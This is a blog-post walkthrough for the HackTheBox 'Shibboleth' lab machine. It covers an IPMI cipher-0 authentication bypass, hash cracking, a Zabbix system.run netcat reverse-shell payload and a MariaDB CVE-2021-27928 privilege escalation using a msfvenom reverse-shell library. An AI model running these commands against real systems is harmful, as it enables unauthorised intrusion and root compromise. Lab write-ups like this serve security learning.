Open in app

Sign in

Write

Sign in

Shibboleth writeup | HackTheBox

Karim Reda
6 min readApr 2, 2022

--

Hello Friends,

Happy Ramadan to all….

Today we will go in awesome journey to solve this great machine at HTB.

first of all we will do nmap scan to see open ports that will help us in our attack.

here, I found 1 open port for website. then, I will add shibboleth.htb to my etc/hosts file.

when I visit website , I didn’t find anything useful.

now, I will search for interesting endpoints or directories using gobuster tool.

I found 2 directories ,but when I go to them , I didn’t find anything useful too.

now , I got an idea, I will search for interesting subdomains using wfuzz tool.

I found 3 interesting subdomains ,but one of them may seem like as service or anything like that.

I will go to “zabbix.shibboleth.htb” and i will find the login form.

I will go to the help page to find the documentation to search for any useful information.

Wow, We know that zabbix is version 5.0.

now, we will use google to find any public exploit to this service.

I will find that it vulnerable to SQL injection and XSS : https://packetstormsecurity.com/files/163657/Zabbix-5.x-SQL-Injection-Cross-Site-Scripting.html

and It vulnerable to RCE (Authenticated) : https://www.exploit-db.com/exploits/50816

but I didn’t do anything with this information.

now, I realized that i missed some thing, what about if there is another open port.

now, I will retry nmap scan to search for open UDP ports.

already, we found port no. 623 open ,but this service name is strange for me.

after some searching, I found this great article: https://book.hacktricks.xyz/pentesting/623-udp-ipmi that will explain all-things about this port and how to exploit it.

first thing that will do with msf console , that we want to know ipmi version

now, we found that IPMI version is 2.0

after some searching I realized that this version gives us the ability to bypass ipmi authentication via cipher 0.

but we need to have valid user first.

now, we succeeded to know valid user named administrator.

you should to install ipmi tools at your local machine before continue the rest steps using this command:

apt-get install ipmitool

use the following command to dump list of users using cipher 0..

ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P root user list

now repeat the last step to dump hashes again from msf module.

save the hash to text file at your local machine, then use this hashcat command to crack the hash….

hashcat -m 7300hashes.txt /usr/share/wordlists/rockyou.txt — force

now , we have user and password , what should i do with them??

remember that you have reached to login form related to zabbix before,

try to login , yeah it is correct and we have succeeded to login to dashboard.

now , we want to got initial access to the system from this dashboard.

after googling, i found this link that helps me to know more about the environment of zabbix dashboard: https://stackoverflow.com/questions/24222086/how-to-run-command-on-zabbix-agents

i will go forward with steps in the above thread to get initial access.

we should create new item and follow the rest of steps.

we created a new item and added reverse shell payload at key input field such as the steps in the article.

after we adding it, we can execute it….

I succeeded to get a shell but the shell is not stable .

after some searching in zabbix documentation, i found that i should add “nowait” argument to our reverse shell payload to get a stable command & shell.

The final payload is: system.run[rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <yourIP> <Port>/tmp/f, nowait]

yes, we did it , we managed to get a staple shell now.

first thing now, we want to get another user to get the first flag “user flag”…

Getting Root

first thing i do when i try to escalate my privileges , i run this command:

sudo -l

to see all sudo commands that i can run.

user can’t run any sudo command.

then, we will run:

find / -group ipmi-svc 2>/dev/null

to get all things that we have access to…..

I saw a file that may be interested for me named: /etc/zabbix/zabbix_server.conf

let’s read it…..

while reading config file, we will find DB creds…

we will try to connect using this creds in mysql…

we managed to connect correctly….

I realized the DB version, I will search for public exploit for it…

I think this link: https://github.com/Al1ex/CVE-2021-27928 will be useful in this phase.

first , i will generate my payload using:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf-so -o CVE-2021–27928.so

transfer the exploit file to victim machine….

reconnect to database with creds and write this query: SET GLOBAL wsrep_provider=”path_to_exploit”;

Wow, I don’t believe it, I rooted this extreme machine.

Thanks for reading❤

Follow me on LinkedIn: Karim Reda | LinkedIn

Hackthebox Writeup
Hackthebox Walkthrough
Hackthebox Challenge
Penetration Testing
Red Team

--

--

Karim Reda

Written by Karim Reda

10 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams